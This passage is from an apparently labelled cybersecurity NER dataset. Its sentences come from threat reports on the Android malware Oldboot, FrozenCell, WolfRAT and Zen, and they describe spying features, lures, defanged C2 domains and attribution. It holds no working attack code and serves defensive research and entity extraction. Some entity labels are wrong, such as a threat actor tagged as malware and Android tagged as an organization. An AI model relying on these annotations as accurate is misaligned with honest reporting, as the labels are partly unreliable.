"source": "cyner_train"}} {"text": "This bootkit is not the first of this kind .", "spans": {}, "info": {"id": "cyner_train_001984", "source": "cyner_train"}} {"text": "But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully , the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone .", "spans": {"MALWARE: Android.Oldboot": [[4, 19]], "SYSTEM: android": [[118, 125]]}, "info": {"id": "cyner_train_001986", "source": "cyner_train"}} {"text": "Users are recommended to install apps from authorized stores such as Google Play , disable installation of apps from 'Unknown Sources ' and for a better security install a reputed security application .", "spans": {"SYSTEM: Google Play": [[69, 80]]}, "info": {"id": "cyner_train_001987", "source": "cyner_train"}} {"text": "You can also try to re-flash your device with its original ROM .", "spans": {}, "info": {"id": "cyner_train_001988", "source": "cyner_train"}} {"text": "After flashing , the bootkit will be removed .", "spans": {}, "info": {"id": "cyner_train_001989", "source": "cyner_train"}} {"text": "FrozenCell : Multi-Platform Surveillance Campaign Against Palestinians October 5 , 2017 FrozenCell has been seen masquerading as various well known social media and chat applications as well as an app likely only used by Palestinian or Jordanian students sitting their 2016 general exams .", "spans": {"MALWARE: FrozenCell": [[0, 10], [88, 98]]}, "info": {"id": "cyner_train_001990", "source": "cyner_train"}} {"text": "Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: FrozenCell": [[75, 85]]}, "info": {"id": "cyner_train_001991", "source": "cyner_train"}} {"text": "FrozenCell is the mobile component of a multi-platform attack we 've seen a threat actor known as \" 
Two-tailed Scorpion/APT-C-23 , '' use to spy on victims through compromised mobile devices and desktops .", "spans": {"MALWARE: FrozenCell": [[0, 10]], "MALWARE: Two-tailed Scorpion/APT-C-23": [[100, 128]]}, "info": {"id": "cyner_train_001993", "source": "cyner_train"}} {"text": "The desktop components of this attack , previously discovered by Palo Alto Network , are known as KasperAgent and Micropsia .", "spans": {"ORGANIZATION: Palo Alto Network": [[65, 82]], "MALWARE: KasperAgent": [[98, 109]], "MALWARE: Micropsia": [[114, 123]]}, "info": {"id": "cyner_train_001994", "source": "cyner_train"}} {"text": "More data is appearing daily , leading us to believe the actors are still highly active .", "spans": {}, "info": {"id": "cyner_train_001996", "source": "cyner_train"}} {"text": "We are continuing to watch it closely .", "spans": {}, "info": {"id": "cyner_train_001997", "source": "cyner_train"}} {"text": "Government agencies and enterprises should look at this threat as an example of the kind of spying that is now possible given how ubiquitous mobile devices are in the workplace .", "spans": {}, "info": {"id": "cyner_train_001999", "source": "cyner_train"}} {"text": "What it does FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": {"MALWARE: FrozenCell": [[13, 23]], "SYSTEM: Facebook": [[78, 86]], "SYSTEM: WhatsApp": [[89, 97]], "SYSTEM: Messenger": [[100, 109]], "SYSTEM: LINE": [[112, 116]], "SYSTEM: LoveChat": [[123, 131]]}, "info": {"id": "cyner_train_002002", "source": "cyner_train"}} {"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. 
, cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data", "spans": {"MALWARE: FrozenCell": [[27, 37]]}, "info": {"id": "cyner_train_002005", "source": "cyner_train"}} {"text": "from only one misconfigured command and control server ( out of over 37 servers ) .", "spans": {}, "info": {"id": "cyner_train_002006", "source": "cyner_train"}} {"text": "Split of exfiltrated data Some noteworthy files identified in content taken from compromised devices include passport photos , audio recordings of calls , other images , and a PDF document with data on 484 individuals .", "spans": {}, "info": {"id": "cyner_train_002008", "source": "cyner_train"}} {"text": "The PDF lists dates of birth , gender , passport numbers , and names .", "spans": {}, "info": {"id": "cyner_train_002009", "source": "cyner_train"}} {"text": "Potential targets The actors behind FrozenCell used an online service that geolocates mobile devices based on nearby cell towers to track targets .", "spans": {"MALWARE: FrozenCell": [[36, 46]]}, "info": {"id": "cyner_train_002010", "source": "cyner_train"}} {"text": "This data shows a distinct concentration of infected devices beaconing from Gaza , Palestine .", "spans": {}, "info": {"id": "cyner_train_002011", "source": "cyner_train"}} {"text": "It has not been confirmed whether these are from test devices or the devices of victims .", "spans": {}, "info": {"id": "cyner_train_002014", "source": "cyner_train"}} {"text": "We were also able to link the FrozenCell 's Android infrastructure to numerous desktop samples that are part of the larger multi-platform attack .", "spans": {"MALWARE: FrozenCell": [[30, 40]], "SYSTEM: Android": [[44, 51]]}, "info": 
{"id": "cyner_train_002015", "source": "cyner_train"}} {"text": "It appears the attackers sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) .", "spans": {"ORGANIZATION: Palestinian Security Services": [[124, 153]], "ORGANIZATION: General Directorate of Civil Defence": [[160, 196]], "ORGANIZATION: Ministry of the Interior": [[199, 223]], "ORGANIZATION: Palestinian National Liberation Front": [[262, 299]]}, "info": {"id": "cyner_train_002016", "source": "cyner_train"}} {"text": "Some malicious files associated with these samples were titled the following : Council_of_ministres_decision Minutes of the Geneva Meeting on Troops Summary of today 's meetings.doc.exe The most important points of meeting the memory of the late President Abu Omar may Allah have mercy on him - Paper No .", "spans": {}, "info": {"id": "cyner_train_002018", "source": "cyner_train"}} {"text": "1 Fadi Alsalamin scandal with an Israeli officer - exclusive - watched before the deletion - Fadi Elsalameen The details of the assassination of President Arafat_06-12-2016_docx Quds.rar Many of these executables are associated with various short links created using Bit.ly , a URL shortening service .", "spans": {"SYSTEM: Bit.ly": [[267, 273]]}, "info": {"id": "cyner_train_002019", "source": "cyner_train"}} {"text": "Infrastructure At the time of writing the following domains have either been used by this family or are currently active .", "spans": {}, "info": {"id": "cyner_train_002022", "source": "cyner_train"}} {"text": "We expect this list to grow given that this actor has changed its infrastructure numerous times in 2017 .", "spans": {}, "info": {"id": "cyner_train_002023", "source": "cyner_train"}} {"text": "] orgmary-crawley [ .", "spans": {}, "info": 
{"id": "cyner_train_002026", "source": "cyner_train"}} {"text": "] comrose-sturat [ .", "spans": {}, "info": {"id": "cyner_train_002028", "source": "cyner_train"}} {"text": "] xyzdebra-morgan [ .", "spans": {}, "info": {"id": "cyner_train_002030", "source": "cyner_train"}} {"text": "] infoacount-manager [ .", "spans": {}, "info": {"id": "cyner_train_002032", "source": "cyner_train"}} {"text": "] infogooogel-drive [ .", "spans": {}, "info": {"id": "cyner_train_002033", "source": "cyner_train"}} {"text": "] commediauploader [ .", "spans": {}, "info": {"id": "cyner_train_002034", "source": "cyner_train"}} {"text": "] comgo-mail-accounts [ .", "spans": {}, "info": {"id": "cyner_train_002041", "source": "cyner_train"}} {"text": "] netsybil-parks [ .", "spans": {}, "info": {"id": "cyner_train_002043", "source": "cyner_train"}} {"text": "] infodavos-seaworth [ .", "spans": {}, "info": {"id": "cyner_train_002044", "source": "cyner_train"}} {"text": "] orgacount-manager [ .", "spans": {}, "info": {"id": "cyner_train_002046", "source": "cyner_train"}} {"text": "] comlila-tournai [ .", "spans": {}, "info": {"id": "cyner_train_002047", "source": "cyner_train"}} {"text": "] comaccount-manager [ .", "spans": {}, "info": {"id": "cyner_train_002048", "source": "cyner_train"}} {"text": "] orgmediauploader [ .", "spans": {}, "info": {"id": "cyner_train_002049", "source": "cyner_train"}} {"text": "] infomavis-dracula [ .", "spans": {}, "info": {"id": "cyner_train_002052", "source": "cyner_train"}} {"text": "] infogoogle-support-team [ .", "spans": {}, "info": {"id": "cyner_train_002054", "source": "cyner_train"}} {"text": "] comuseraccount [ .", "spans": {}, "info": {"id": "cyner_train_002056", "source": "cyner_train"}} {"text": "] comfeteh-asefa [ .", "spans": {}, "info": {"id": "cyner_train_002059", "source": "cyner_train"}} {"text": "] comlagertha-lothbrok [ .", "spans": {}, "info": {"id": "cyner_train_002060", "source": "cyner_train"}} {"text": "This mistake in operational 
security allowed us to gain visibility into exfiltrated content for a number of devices .", "spans": {}, "info": {"id": "cyner_train_002062", "source": "cyner_train"}} {"text": "Continued mirroring suggests it is likely a regularly cleaned staging server .", "spans": {}, "info": {"id": "cyner_train_002063", "source": "cyner_train"}} {"text": "We sourced the over 561MB of exfiltrated data from this domain alone , all of which we found to be 7z compressed and password protected .", "spans": {}, "info": {"id": "cyner_train_002064", "source": "cyner_train"}} {"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios .", "spans": {}, "info": {"id": "cyner_train_002065", "source": "cyner_train"}} {"text": "Visually , this can be represented as follows : Android ID When combined with our analysis of indexed directories on C2 infrastructure , we were able to easily automate the generation of the password used by each device and , in turn , successfully decompress all exfiltrated content from compromised devices .", "spans": {"SYSTEM: Android": [[48, 55]]}, "info": {"id": "cyner_train_002067", "source": "cyner_train"}} {"text": "FrozenCell is part of a very successful , multi-platform surveillance campaign .", "spans": {"MALWARE: FrozenCell": [[0, 10]]}, "info": {"id": "cyner_train_002071", "source": "cyner_train"}} {"text": "Attackers are growing smarter , targeting individuals through the devices and the services they use most .", "spans": {}, "info": {"id": "cyner_train_002072", "source": "cyner_train"}} {"text": "TUESDAY , MAY 19 , 2020 The wolf is back ... 
NEWS SUMMARY Thai Android devices and users are being targeted by a modified version of DenDroid we are calling \" WolfRAT , '' now targeting messaging apps like WhatsApp , Facebook Messenger and Line .", "spans": {"SYSTEM: Android": [[63, 70]], "MALWARE: DenDroid": [[133, 141]], "MALWARE: WolfRAT": [[159, 166]], "SYSTEM: WhatsApp": [[206, 214]], "SYSTEM: Facebook Messenger": [[217, 235]], "SYSTEM: Line": [[240, 244]]}, "info": {"id": "cyner_train_002074", "source": "cyner_train"}} {"text": "We assess with high confidence that this modified version is operated by the infamous Wolf Research .", "spans": {"ORGANIZATION: Wolf Research": [[86, 99]]}, "info": {"id": "cyner_train_002075", "source": "cyner_train"}} {"text": "This actor has shown a surprising level of amateur actions , including code overlaps , open-source project copy/paste , classes never being instanced , unstable packages and unsecured panels .", "spans": {}, "info": {"id": "cyner_train_002076", "source": "cyner_train"}} {"text": "EXECUTIVE SUMMARY Cisco Talos has discovered a new Android malware based on a leak of the DenDroid malware family .", "spans": {"ORGANIZATION: Cisco Talos": [[18, 29]], "MALWARE: DenDroid": [[90, 98]]}, "info": {"id": "cyner_train_002077", "source": "cyner_train"}} {"text": "We named this malware \" WolfRAT '' due to strong links between this malware ( and the command and control ( C2 ) infrastructure ) and Wolf Research , an infamous organization that developed interception and espionage-based malware and was publicly described by CSIS during Virus Bulletin 2018 .", "spans": {"MALWARE: WolfRAT": [[24, 31]], "ORGANIZATION: Wolf Research": [[134, 147]]}, "info": {"id": "cyner_train_002078", "source": "cyner_train"}} {"text": "Some of the C2 servers are located in Thailand .", "spans": {}, "info": {"id": "cyner_train_002082", "source": "cyner_train"}} {"text": "The panels also contain Thai JavaScript comments and the domain names also contain references to Thai food , a tactic 
commonly employed to entice users to click/visit these C2 panels without much disruption .", "spans": {}, "info": {"id": "cyner_train_002083", "source": "cyner_train"}} {"text": "We identified a notable lack of sophistication in this investigation such as copy/paste , unstable code , dead code and panels that are freely open .", "spans": {}, "info": {"id": "cyner_train_002084", "source": "cyner_train"}} {"text": "WolfRAT is based on a previously leaked malware named DenDroid .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "MALWARE: DenDroid": [[54, 62]]}, "info": {"id": "cyner_train_002086", "source": "cyner_train"}} {"text": "The new malware appears to be linked to the infamous Wolf Research organization and targets Android devices located in Thailand .", "spans": {"ORGANIZATION: Wolf Research": [[53, 66]], "SYSTEM: Android": [[92, 99]]}, "info": {"id": "cyner_train_002087", "source": "cyner_train"}} {"text": "The malware mimics legit services such as Google service , GooglePlay or Flash update .", "spans": {"ORGANIZATION: Google": [[42, 48]], "SYSTEM: GooglePlay": [[59, 69]], "SYSTEM: Flash": [[73, 78]]}, "info": {"id": "cyner_train_002089", "source": "cyner_train"}} {"text": "The malware is not really advanced and is based on a lot of copy/paste from public sources available on the Internet .", "spans": {}, "info": {"id": "cyner_train_002090", "source": "cyner_train"}} {"text": "The C2 infrastructure contains a lack of sophistication such as open panels , reuse of old servers publicly tagged as malicious… So what ?", "spans": {}, "info": {"id": "cyner_train_002091", "source": "cyner_train"}} {"text": "After being publicly denounced by CSIS Group — a threat intelligence company in Denmark — Wolf Research was closed and a new organization named LokD was created .", "spans": {"ORGANIZATION: CSIS Group": [[34, 44]], "ORGANIZATION: Wolf Research": [[90, 103]], "ORGANIZATION: LokD": [[144, 148]]}, "info": {"id": "cyner_train_002092", "source": "cyner_train"}} {"text": 
"This new organization seems to work on securing Android devices .", "spans": {"ORGANIZATION: Android": [[48, 55]]}, "info": {"id": "cyner_train_002093", "source": "cyner_train"}} {"text": "However , thanks to the infrastructure sharing and forgotten panel names , we assess with high confidence that this actor is still active , it is still developing malware and has been using it from mid-June to today .", "spans": {}, "info": {"id": "cyner_train_002094", "source": "cyner_train"}} {"text": "On the C2 panel , we found a potential link between Wolf Research and another Cyprus organization named Coralco Tech .", "spans": {"ORGANIZATION: Wolf Research": [[52, 65]], "ORGANIZATION: Coralco Tech": [[104, 116]]}, "info": {"id": "cyner_train_002095", "source": "cyner_train"}} {"text": "This organization is also working on interception technology .", "spans": {}, "info": {"id": "cyner_train_002096", "source": "cyner_train"}} {"text": "LINKS TO WOLF INTELLIGENCE During the Virus Bulletin conference in 2018 , CSIS researchers Benoît Ancel and Aleksejs Kuprins did a presentation on Wolf Research and the offensive arsenal developed by the organization .", "spans": {"ORGANIZATION: CSIS": [[74, 78]], "ORGANIZATION: Wolf Research": [[147, 160]]}, "info": {"id": "cyner_train_002097", "source": "cyner_train"}} {"text": "They mentioned an Android , iOS and Windows remote access tool ( RAT ) .", "spans": {"SYSTEM: Android": [[18, 25]], "SYSTEM: iOS": [[28, 31]], "SYSTEM: Windows": [[36, 43]]}, "info": {"id": "cyner_train_002098", "source": "cyner_train"}} {"text": "Their findings showed that Wolf is headquartered in Germany with offices in Cyprus , Bulgaria , Romania , India and ( possibly ) the U.S .", "spans": {}, "info": {"id": "cyner_train_002099", "source": "cyner_train"}} {"text": "However , the director created a new organization in Cyprus named LokD .", "spans": {"ORGANIZATION: LokD": [[66, 70]]}, "info": {"id": "cyner_train_002101", "source": "cyner_train"}} {"text": "Based on 
infrastructure overlaps and leaked information , we assess with high confidence that the malware we identified and present in this paper is linked to Wolf Research .", "spans": {"ORGANIZATION: Wolf Research": [[159, 172]]}, "info": {"id": "cyner_train_002104", "source": "cyner_train"}} {"text": "One of the samples ( e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 ) uses the C2 server svcws [ .", "spans": {}, "info": {"id": "cyner_train_002105", "source": "cyner_train"}} {"text": "The new one with the title \" Coralco Archimedes , '' and an older version with the title \" Wolf Intelligence : '' New panel Old panel The new panel name contains \" Coralco '' in its name .", "spans": {}, "info": {"id": "cyner_train_002109", "source": "cyner_train"}} {"text": "Coralco Tech is an organization located in Cyprus and providing interception tools .", "spans": {"ORGANIZATION: Coralco Tech": [[0, 12]]}, "info": {"id": "cyner_train_002110", "source": "cyner_train"}} {"text": "We can not say for sure if Wolf Research and Coralco Tech are linked , but this panel name , their offerings and the panel layout would suggest it should be considered suspiciously linked .", "spans": {"ORGANIZATION: Wolf Research": [[27, 40]], "ORGANIZATION: Coralco Tech": [[45, 57]]}, "info": {"id": "cyner_train_002111", "source": "cyner_train"}} {"text": "Coralco Tech 's services description .", "spans": {}, "info": {"id": "cyner_train_002112", "source": "cyner_train"}} {"text": "VICTIMOLOGY ON THE IDENTIFIED CAMPAIGNS The campaigns we analyzed targeted Android devices in Thailand .", "spans": {"SYSTEM: Android": [[75, 82]]}, "info": {"id": "cyner_train_002113", "source": "cyner_train"}} {"text": "The C2 server domain is linked to Thai food : Nampriknum [ .", "spans": {}, "info": {"id": "cyner_train_002114", "source": "cyner_train"}} {"text": "] net : Nam Phrik Num Somtum [ .", "spans": {}, "info": {"id": "cyner_train_002115", "source": "cyner_train"}} {"text": "] today : Som Tum We also 
identified comments in Thai on the C2 infrastructure mentioned in the previous chapter : MALWARE DenDroid The Android malware is based on the DenDroid Android malware .", "spans": {"MALWARE: DenDroid": [[123, 131], [168, 176]], "SYSTEM: Android": [[136, 143]]}, "info": {"id": "cyner_train_002116", "source": "cyner_train"}} {"text": "Several analysis reports were published on this malware in 2014 and , finally , the source code was leaked in 2015 .", "spans": {}, "info": {"id": "cyner_train_002117", "source": "cyner_train"}} {"text": "The original leak is no longer available on github.com , but a copy can be found here .", "spans": {}, "info": {"id": "cyner_train_002118", "source": "cyner_train"}} {"text": "The table below shows the commands available to the operator for tasking on infected devices .", "spans": {}, "info": {"id": "cyner_train_002119", "source": "cyner_train"}} {"text": "This malware is simplistic in comparison to some modern-day Android malware .", "spans": {"SYSTEM: Android": [[60, 67]]}, "info": {"id": "cyner_train_002120", "source": "cyner_train"}} {"text": "The commands are self-explanatory and show the features included in the malware .", "spans": {}, "info": {"id": "cyner_train_002122", "source": "cyner_train"}} {"text": "Some of them like takephoto , takevideo , recordaudio , getsentsms and uploadpictures are focused on espionage activities .", "spans": {}, "info": {"id": "cyner_train_002123", "source": "cyner_train"}} {"text": "Others like transferbot , promptupdate and promptuninstall are meant to help the operator manage the malware .", "spans": {}, "info": {"id": "cyner_train_002124", "source": "cyner_train"}} {"text": "Version # 1 : June 2019 — Domain : databit [ .", "spans": {}, "info": {"id": "cyner_train_002125", "source": "cyner_train"}} {"text": "] today During our investigation , we identified at least four major releases of the RAT .", "spans": {}, "info": {"id": "cyner_train_002126", "source": "cyner_train"}} {"text": "The code 
is obfuscated but not packed .", "spans": {}, "info": {"id": "cyner_train_002129", "source": "cyner_train"}} {"text": "This malware also contains a screen recorder .", "spans": {}, "info": {"id": "cyner_train_002130", "source": "cyner_train"}} {"text": "During our analysis of this sample , we did notice that the class itself is never called or used by the malware .", "spans": {}, "info": {"id": "cyner_train_002133", "source": "cyner_train"}} {"text": "It remains available within the source code but no method of use takes place .", "spans": {}, "info": {"id": "cyner_train_002134", "source": "cyner_train"}} {"text": "Version # 2 : June - Aug. 2019 — Domain : somtum [ .", "spans": {}, "info": {"id": "cyner_train_002135", "source": "cyner_train"}} {"text": "] today This is the first version that shows the code organization evolution that will continue to be used on all other functions throughout this malware .", "spans": {}, "info": {"id": "cyner_train_002136", "source": "cyner_train"}} {"text": "One of the first changes that stands out is that the screen recording feature mentioned in the previous sample has been removed .", "spans": {}, "info": {"id": "cyner_train_002138", "source": "cyner_train"}} {"text": "This class is based on public code belonging to the package praeda.muzikmekan , which can be found here among other places .", "spans": {}, "info": {"id": "cyner_train_002140", "source": "cyner_train"}} {"text": "Just like in previous examples , the malware author does not use this package .", "spans": {}, "info": {"id": "cyner_train_002141", "source": "cyner_train"}} {"text": "Missing permissions The lack of the READ_FRAME_BUFFER permission can be justified by the removal of the screen record feature .", "spans": {}, "info": {"id": "cyner_train_002142", "source": "cyner_train"}} {"text": "The ACCESS_SUPERUSER may have been removed because it was deprecated upon the release of Android 5.0 Lollipop which happened in 2014 .", "spans": {"SYSTEM: Android 5.0": [[89, 
100]], "SYSTEM: Lollipop": [[101, 109]]}, "info": {"id": "cyner_train_002143", "source": "cyner_train"}} {"text": "Version # 3 : Sept. - Dec. 2019 — Domain : ponethus [ .", "spans": {}, "info": {"id": "cyner_train_002145", "source": "cyner_train"}} {"text": "] com Given that there is some overlap in the previous two versions , it came as no surprise to us that we finally identified a sample which is an evolution based on both previous versions .", "spans": {}, "info": {"id": "cyner_train_002146", "source": "cyner_train"}} {"text": "This sample is clearly a mix between the two .", "spans": {}, "info": {"id": "cyner_train_002147", "source": "cyner_train"}} {"text": "However , this time , the permission is actually used .", "spans": {}, "info": {"id": "cyner_train_002150", "source": "cyner_train"}} {"text": "WhatsApp message capture The service com.serenegiant.service.ScreenRecorderService , is invoked by the ScreenRecorderActivity .", "spans": {"SYSTEM: WhatsApp": [[0, 8]]}, "info": {"id": "cyner_train_002151", "source": "cyner_train"}} {"text": "Upon creation , this activity launches a thread that will loop on a 50-second interval .", "spans": {}, "info": {"id": "cyner_train_002152", "source": "cyner_train"}} {"text": "In the first iteration , the screen recording is started and will only stop when the RAT determines that WhatsApp is not running .", "spans": {"SYSTEM: WhatsApp": [[105, 113]]}, "info": {"id": "cyner_train_002153", "source": "cyner_train"}} {"text": "It 's restarted in the next cycle independently based on if WhatsApp is running .", "spans": {"SYSTEM: WhatsApp": [[60, 68]]}, "info": {"id": "cyner_train_002154", "source": "cyner_train"}} {"text": "Even though we could not find indications of being in use , two stand out .", "spans": {}, "info": {"id": "cyner_train_002156", "source": "cyner_train"}} {"text": "Bluetooth — which allows the interaction with the Bluetooth interface , and net/deacon — which implements a beaconing system based on UDP .", 
"spans": {}, "info": {"id": "cyner_train_002157", "source": "cyner_train"}} {"text": "Again , this package source code is publicly available and can be found here .", "spans": {}, "info": {"id": "cyner_train_002159", "source": "cyner_train"}} {"text": "One of the uses the malware gives to this package is the execution of the command \" dumpsys '' to determine if certain activities are running .", "spans": {}, "info": {"id": "cyner_train_002160", "source": "cyner_train"}} {"text": "Check if chat apps are running In the above example , the malware is searching for Line , Facebook Messenger and WhatsApp activities .", "spans": {"SYSTEM: Facebook Messenger": [[90, 108]], "SYSTEM: WhatsApp": [[113, 121]]}, "info": {"id": "cyner_train_002161", "source": "cyner_train"}} {"text": "This is part of a class called CaptureService , which already existed in the previous version but it was not duly implemented .", "spans": {}, "info": {"id": "cyner_train_002162", "source": "cyner_train"}} {"text": "Previous version The capture service class implements the chat applications interception .", "spans": {}, "info": {"id": "cyner_train_002163", "source": "cyner_train"}} {"text": "Another novelty is a VPN-related package , which is based on OrbotVPN .", "spans": {"SYSTEM: OrbotVPN": [[61, 69]]}, "info": {"id": "cyner_train_002166", "source": "cyner_train"}} {"text": "Once again , it does n't seem to actually be in use .", "spans": {}, "info": {"id": "cyner_train_002167", "source": "cyner_train"}} {"text": "The same happens with the package squareup.otto , which is an open-source bus implementation focused on Android implementation .", "spans": {"SYSTEM: Android": [[104, 111]]}, "info": {"id": "cyner_train_002168", "source": "cyner_train"}} {"text": "Both sources can be found here and here .", "spans": {}, "info": {"id": "cyner_train_002169", "source": "cyner_train"}} {"text": "Version # 4 : April 2020 — Domain : nampriknum.net Following the same pattern , this version has some added 
features and others , which were not in use , removed .", "spans": {}, "info": {"id": "cyner_train_002170", "source": "cyner_train"}} {"text": "First of all the new package name is com.google.services , which can easily be confused with a legitimate Google service .", "spans": {"ORGANIZATION: Google": [[106, 112]]}, "info": {"id": "cyner_train_002171", "source": "cyner_train"}} {"text": "The VPN package is no longer present , further reinforcing our conclusion that it was not in use .", "spans": {}, "info": {"id": "cyner_train_002172", "source": "cyner_train"}} {"text": "WolfRAT application screen The Google GMS and Firebase service has been added , however , no configuration has been found , even though services seem to be referenced in the of a new class .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "SYSTEM: Google GMS": [[31, 41]], "SYSTEM: Firebase": [[46, 54]]}, "info": {"id": "cyner_train_002173", "source": "cyner_train"}} {"text": "This would allow the RAT to receive system notifications .", "spans": {}, "info": {"id": "cyner_train_002175", "source": "cyner_train"}} {"text": "Notification handling method The class is only implemented in debug mode , pushing all captured information into the log .", "spans": {}, "info": {"id": "cyner_train_002176", "source": "cyner_train"}} {"text": "This service , along with the API , was fully decommissioned in March 2019 .", "spans": {}, "info": {"id": "cyner_train_002178", "source": "cyner_train"}} {"text": "This version adds one significant class — it requests DEVICE_ADMIN privileges .", "spans": {}, "info": {"id": "cyner_train_002179", "source": "cyner_train"}} {"text": "Device admin policies Looking at the policy 's definition , we can see that it lists all the available policies even if most of them are deprecated on Android 10.0 and their usage results in a security exception .", "spans": {"SYSTEM: Android 10.0": [[151, 163]]}, "info": {"id": "cyner_train_002180", "source": "cyner_train"}} {"text": "The code 
implementation again seems that it has been added for testing purposes only .", "spans": {}, "info": {"id": "cyner_train_002181", "source": "cyner_train"}} {"text": "Versions overview The DenDroid code base was kept to such an extent that even the original base64-encoded password was kept .", "spans": {"MALWARE: DenDroid": [[22, 30]]}, "info": {"id": "cyner_train_002182", "source": "cyner_train"}} {"text": "Original password The main service follows the same structure as the first version , the anti-analysis features are primitive , only checking the emulator environment without any kind of packing or obfuscation .", "spans": {}, "info": {"id": "cyner_train_002183", "source": "cyner_train"}} {"text": "The malware will start the main service if all the requested permissions and the device admin privileges are granted .", "spans": {}, "info": {"id": "cyner_train_002184", "source": "cyner_train"}} {"text": "Otherwise , it will launch an ACTION_APPLICATION_SETTINGS intent trying to trick the user to grant the permissions .", "spans": {}, "info": {"id": "cyner_train_002185", "source": "cyner_train"}} {"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration .", "spans": {}, "info": {"id": "cyner_train_002187", "source": "cyner_train"}} {"text": "CONCLUSION We witness actors continually using open-source platforms , code and packages to create their own software .", "spans": {}, "info": {"id": "cyner_train_002189", "source": "cyner_train"}} {"text": "Some are carried out well , others , like WolfRAT , are designed with an overload of functionality in mind as opposed to factoring any sensible approach to the development aspect .", "spans": {"MALWARE: WolfRAT": [[42, 49]]}, "info": {"id": "cyner_train_002190", "source": "cyner_train"}} {"text": "throughout the Android package .", "spans": {"SYSTEM: Android": [[15, 22]]}, "info": {"id": "cyner_train_002193", "source": 
"cyner_train"}} {"text": "This can be packaged and \" sold '' in many different ways to customers .", "spans": {}, "info": {"id": "cyner_train_002195", "source": "cyner_train"}} {"text": "A \" Tracking tool '' or an \" Admin tool '' are often cited for these kinds of tools for \" commercial '' or \" enterprise '' usage .", "spans": {}, "info": {"id": "cyner_train_002196", "source": "cyner_train"}} {"text": "Wolf Research claimed to shut down their operations but we clearly see that their previous work continues under another guise .", "spans": {}, "info": {"id": "cyner_train_002197", "source": "cyner_train"}} {"text": "The ability to carry out these types of intelligence-gathering activities on phones represents a huge score for the operator .", "spans": {}, "info": {"id": "cyner_train_002198", "source": "cyner_train"}} {"text": "The chat details , WhatsApp records , messengers and SMSs of the world carry some sensitive information which people often forget when communicating with their devices .", "spans": {"SYSTEM: WhatsApp": [[19, 27]]}, "info": {"id": "cyner_train_002199", "source": "cyner_train"}} {"text": "We see WolfRAT specifically targeting a highly popular encrypted chat app in Asia , Line , which suggests that even a careful user with some awareness around end-to-end encryption chats would still be at the mercy of WolfRAT and it 's prying eyes .", "spans": {"MALWARE: WolfRAT": [[7, 14], [217, 224]], "SYSTEM: Line": [[84, 88]]}, "info": {"id": "cyner_train_002200", "source": "cyner_train"}}
{"text": "] com nampriknum [ .", "spans": {}, "info": {"id": "cyner_train_002212", "source": "cyner_train"}} {"text": "] today admin [ .databit [ .today cendata [ .", "spans": {}, "info": {"id": "cyner_train_002234", "source": "cyner_train"}} {"text": "'' in a variety of ways , such as static analysis , dynamic analysis , and machine learning .", "spans": {}, "info": {"id": "cyner_train_002242", "source": "cyner_train"}} {"text": "While our systems are great at automatically detecting and protecting against PHAs , we believe the best security comes from the combination of automated scanning and skilled human review .", "spans": {}, "info": {"id": "cyner_train_002243", "source": "cyner_train"}} {"text": "Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Google": [[90, 96]]}, "info": {"id": "cyner_train_002245", "source": "cyner_train"}} {"text": "Zen apps gain access to root permissions from a rooting trojan in its infection chain .", "spans": {"MALWARE: Zen": [[0, 3]]}, "info": {"id": "cyner_train_002247", "source": 
"cyner_train"}} {"text": "In this blog post , we do not differentiate between the rooting component and the component that abuses root : we refer to them interchangeably as Zen .", "spans": {"MALWARE: Zen": [[147, 150]]}, "info": {"id": "cyner_train_002248", "source": "cyner_train"}} {"text": "PHA authors usually try to hide their tracks , so attribution is difficult .", "spans": {}, "info": {"id": "cyner_train_002252", "source": "cyner_train"}} {"text": "Sometimes , we can attribute different apps to the same author based on a small , unique pieces of evidence that suggest similarity , such as a repetition of an exceptionally rare code snippet , asset , or a particular string in the debug logs .", "spans": {}, "info": {"id": "cyner_train_002253", "source": "cyner_train"}} {"text": "Every once in a while , authors leave behind a trace that allows us to attribute not only similar apps , but also multiple different PHA families to the same group or person .", "spans": {}, "info": {"id": "cyner_train_002254", "source": "cyner_train"}} {"text": "Dynamic code loading makes it impossible to state what kind of PHA it was .", "spans": {}, "info": {"id": "cyner_train_002257", "source": "cyner_train"}} {"text": "This sample displayed ads from various sources .", "spans": {}, "info": {"id": "cyner_train_002258", "source": "cyner_train"}} {"text": "More recent variants blend rooting capabilities and click fraud .", "spans": {}, "info": {"id": "cyner_train_002259", "source": "cyner_train"}} {"text": "This post does n't follow the chronological evolution of Zen , but instead covers relevant samples from least to most complex .", "spans": {"MALWARE: Zen": [[57, 60]]}, "info": {"id": "cyner_train_002261", "source": "cyner_train"}} {"text": "By proxying all requests through a custom server , the real source of ads is opaque .", "spans": {}, "info": {"id": "cyner_train_002263", "source": "cyner_train"}} {"text": "This example shows one possible implementation of this technique .", 
